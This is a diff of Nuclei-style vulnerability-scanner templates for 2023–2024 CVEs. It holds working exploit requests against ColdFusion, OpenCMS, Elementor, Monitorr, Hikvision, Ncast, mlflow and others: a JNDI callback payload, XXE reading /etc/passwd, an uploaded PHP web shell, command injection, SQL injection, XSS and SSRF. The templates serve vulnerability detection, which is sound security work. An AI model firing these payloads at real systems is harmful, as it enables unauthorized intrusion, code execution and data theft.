# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950

17
http/cves/2023/CVE-2023-28662.yaml
View File

@ -6,28 +6,29 @@ info:
severity: critical
description: |
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
reference:
- https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/gift-voucher/
- https://github.com/ARPSyndicate/cvemon
- https://github.com/JoshuaMart/JoshuaMart
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-28662
cwe-id: CWE-89
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
epss-score: 0.00076
epss-percentile: 0.31593
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
metadata:
vendor: codemenschen
product: gift_vouchers
product: "gift_vouchers"
framework: wordpress
fofa-query: body="/wp-content/plugins/gift-voucher/"
fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
max-request: 2
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
flow: http(1) && http(2)
@ -59,4 +60,4 @@ http:
- status_code == 500
- contains(body, 'critical error')
condition: and
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950

7
http/cves/2023/CVE-2023-32563.yaml
View File

@ -13,13 +13,14 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
- https://github.com/mayur-esh/vuln-liners
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-32563
cwe-id: CWE-22
epss-score: 0.43261
epss-percentile: 0.97013
epss-score: 0.42647
epss-percentile: 0.97218
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -56,4 +57,4 @@ http:
part: body_2
words:
- "CVE-2023-32563"
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950

52
http/cves/2023/CVE-2023-38203.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2023-38203
info:
name: Adobe ColdFusion - Deserialization of Untrusted Data
author: yiran
severity: critical
description: |
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.
reference:
- https://blog.projectdiscovery.io/adobe-coldfusion-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2023-38203
- https://github.com/Ostorlab/KEV
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-38203
cwe-id: CWE-502
epss-score: 0.517
epss-percentile: 0.97465
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev
variables:
callback: "{{interactsh-url}}"
jndi: "ldap%3a//{{callback}}/zdfzfd"
http:
- raw:
- |
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- contains(body, "ColdFusion documentation")
condition: and
# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950

48
http/cves/2023/CVE-2023-40355.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2023-40355
info:
name: Axigen WebMail - Cross-Site Scripting
author: amir-h-fallahi
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
reference:
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40355
cwe-id: CWE-79
epss-score: 0.0006
epss-percentile: 0.22931
metadata:
max-request: 3
verified: true
shodan-query: http.favicon.hash:-1247684400
tags: cve,cve2023,xss,axigen,webmail
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950

39
http/cves/2023/CVE-2023-42344.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2023-42344
info:
name: OpenCMS - XML external entity (XXE)
author: 0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
metadata:
max-request: 2
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,xxe,opencms
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950

38
http/cves/2023/CVE-2023-45671.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2023-45671
info:
name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
remediation: It has been fixed in version 0.13.0 Beta 3
reference:
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
- https://nvd.nist.gov/vuln/detail/CVE-2023-45671
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
cve-id: CVE-2023-45671
cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: frigate
product: frigate
shodan-query: title:"Frigate"
tags: cve,cve2023,frigate,xss
http:
- method: GET
path:
- "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
- 'contains(header, "text/html")'
- 'status_code == 404'
condition: and
# digest: 4b0a00483046022100cba5c4d12e50a528bb189f495e3c9da2618e5180146b4624cd3997b834063fe60221009b11601e94531407edaa7ee1e9dfb799e2167598089b2ddcdac99db6d1c3736f:922c64590222798bb761d5b6d8e72950

7
http/cves/2023/CVE-2023-46805.yaml
View File

@ -16,8 +16,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: html:"welcome.cgi?p=logo"
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 2
tags: cve,cve2023,kev,auth-bypass,ivanti
http:
@ -48,4 +49,4 @@ http:
- 'contains(body_2, "block_message")'
- 'contains(header_2, "application/json")'
condition: and
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950

62
http/cves/2023/CVE-2023-48777.yaml Normal file
View File

@ -0,0 +1,62 @@
id: CVE-2023-48777
info:
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
remediation: Fixed in 3.18.2
reference:
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
metadata:
verified: true
max-request: 4
framework: wordpress
publicwww-query: "/wp-content/plugins/elementor/"
tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
variables:
filename: "{{rand_base(6)}}"
payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
- |
GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_4)"
- "status_code_4 == 200"
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
# digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950

9
http/cves/2023/CVE-2023-52085.yaml
View File

@ -14,14 +14,15 @@ info:
cvss-score: 5.4
cve-id: CVE-2023-52085
cwe-id: CWE-22
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12483
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
metadata:
vendor: wintercms
product: winter
shodan-query: title:"Winter CMS"
fofa-query: title="Winter CMS"
shodan-query: "title:\"Winter CMS\""
fofa-query: "title=\"Winter CMS\""
max-request: 4
tags: cve,cve2023,authenticated,lfi,wintercms
http:
@ -68,4 +69,4 @@ http:
regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950

6
http/cves/2023/CVE-2023-6063.yaml
View File

@ -48,13 +48,13 @@ http:
path:
- "{{BaseURL}}/wp-login.php"
headers:
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(5)))NkcI) AND "tqKU"="tqKU
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'duration>=7'
- 'status_code == 200'
- 'contains(body, "wp-admin")'
condition: and
# digest: 490a004630440220711084c66864d0f0ed8c49720ebfc388d1902517733600bac42c326ca8ffe14702206f9bb4ad5b87af58606cf3c4970f194074fc852d625138497b225c64f7b89d6a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210093bf3e2e6772a217d1c09ef23feff29a86dcb2db0c7824b6ca669c673564321a02202f3ace02b3e57883eb764701f4c31c4a1cb5ba8cd42ea02ff8a8e23b05c547f9:922c64590222798bb761d5b6d8e72950

62
http/cves/2023/CVE-2023-6831.yaml Normal file
View File

@ -0,0 +1,62 @@
id: CVE-2023-6831
info:
name: mlflow - Path Traversal
author: byObin
severity: high
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-6831
cwe-id: CWE-22
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12693
metadata:
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
max-request: 2
verified: true
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
http:
- raw:
- |
PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{randstr}}
- |
DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- "Content-Type: application/json"
- "Server: gunicorn"
condition: and
- type: word
part: body_2
words:
- "{}"
- type: status
status:
- 500
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950

56
http/cves/2023/CVE-2023-6895.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "TTL="
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

13
http/cves/2023/CVE-2023-6909.yaml
View File

@ -6,24 +6,25 @@ info:
severity: critical
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
reference:
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2023-6909
cwe-id: CWE-29
metadata:
max-request: 5
verified: true
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
shodan-query: "http.title:\"mlflow\""
tags: cve,cve2023,mlflow,lfi
http:
@ -90,4 +91,4 @@ http:
json:
- '.run.info.run_id'
internal: true
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950

52
http/cves/2024/CVE-2024-0305.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2024-0305
info:
name: Ncast busiFacade - Remote Command Execution
author: BMCel
severity: high
description: |
The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
impact: |
Allows remote attackers to execute arbitrary code on the affected system.
reference:
- https://cxsecurity.com/cveshow/CVE-2024-0305
- https://nvd.nist.gov/vuln/detail/CVE-2024-0305
- https://vuldb.com/?id.249872
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-0305
epss-score: 0.00064
epss-percentile: 0.2597
cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: ncast_project
product: ncast
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
zoomeye-query: title:"高清智能录播系统"
tags: cve,cve2024,ncast,rce
http:
- raw:
- |
POST /classes/common/busiFacade.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- "#str"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502207fea590b5f6bf722200ca68b8832b7c0d3a272c55c2c93cc238fef99772514d0022100b0ca7e5f0234813a63935fa5767fe9d688e5e741e2cd658b5cb02f79d241a220:922c64590222798bb761d5b6d8e72950

70
http/cves/2024/CVE-2024-0713.yaml Normal file
View File

@ -0,0 +1,70 @@
id: CVE-2024-0713
info:
name: Monitorr Services Configuration - Arbitrary File Upload
author: DhiyaneshDK
severity: high
description: |
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://github.com/Tropinene/Yscanner
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-0713
cwe-id: CWE-434
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
epss-score: 0.00061
epss-percentile: 0.2356
metadata:
vendor: monitorr
product: monitorr
verified: true
fofa-query: "icon_hash=\"-211006074\""
max-request: 2
tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn
------WebKitFormBoundaryaquxwjsn
Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
Content-Type: image/jpeg
{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}
------WebKitFormBoundaryaquxwjsn--
matchers:
- type: word
part: body
internal: true
words:
- "has been uploaded to:"
- raw:
- |
GET /assets/data/usrimg/{{file}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "atfersotg"
- type: status
status:
- 200
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950

35
http/cves/2024/CVE-2024-1021.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2024-1021
info:
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
author: BMCel
severity: medium
description: |
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
remediation: |
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
metadata:
max-request: 2
verified: true
fofa-query: "icon_hash=\"871154672\""
tags: cve2024,cve,rebuild,ssrf
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
matchers:
- type: dsl
dsl:
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950

13
http/cves/2024/CVE-2024-1061.yaml
View File

@ -6,14 +6,14 @@ info:
severity: high
description: |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
reference:
- https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player
